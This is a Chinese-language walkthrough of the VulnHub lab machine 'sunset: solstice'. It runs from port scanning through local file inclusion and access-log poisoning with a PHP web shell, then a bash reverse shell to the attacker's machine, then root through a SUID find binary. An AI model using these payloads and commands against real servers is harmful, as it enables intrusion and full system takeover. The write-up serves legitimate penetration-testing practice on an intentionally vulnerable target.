猫宁~~~
地址:https://www.vulnhub.com/entry/sunset-solstice,499/
关注工具和思路。
nmap 192.168.43.0/24
靶机IP 192.168.43.127
nmap -A -p1-65535 192.168.43.127
21/tcp open ftp
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.92
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn netbios-ssn Samba smbd 3.X - 4.X
445/tcp open microsoft-ds netbios-ssn Samba smbd 4.9.5-Debian
2121/tcp open ccproxy-ftp pyftpdlib 1.5.6
3128/tcp open squid-http Squid http proxy 4.6
8593/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
54787/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
62524/tcp open ftp FreeFloat ftpd 1.00
http://192.168.43.127/
http://192.168.43.127:3128/
http://192.168.43.127:8593/
http://192.168.43.127:54787/
dirb http://192.168.43.127/
nikto -h http://192.168.43.127/
发现文件包含漏洞
http://192.168.43.127:8593/index.php?book=../../../../../../etc/passwd
http://192.168.43.127:8593/index.php?book=../../../../../../var/log/apache2/access.log
nc 192.168.43.127 80,回车输入GET /<?php system($_GET['cmd']); ?> HTTP/1.1
或者GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
bash -c 'bash -i >& /dev/tcp/192.168.43.154/4444 0>&1'
http://192.168.43.127:8593/index.php?book=../../../../../../var/log/apache2/access.log&cmd=bash -c 'bash -i >& /dev/tcp/192.168.43.154/4444 0>&1'
攻击机nc -lvnp 4444
获取shell
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@solstice:/var/tmp/webserver$
ps aux | grep root
root 427 0.0 2.0 196744 21184 ? S 05:55 0:00 /usr/bin/php -S 127.0.0.1:57 -t /var/tmp/sv/
cd /var/tmp/sv/
printf "<?php system('chmod o+x /usr/bin/find; chmod +s /usr/bin/find'); ?>" >index.php
curl 127.0.0.1:57/index.php
find . -exec /bin/sh -p ; -quit
whoami
显示root
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)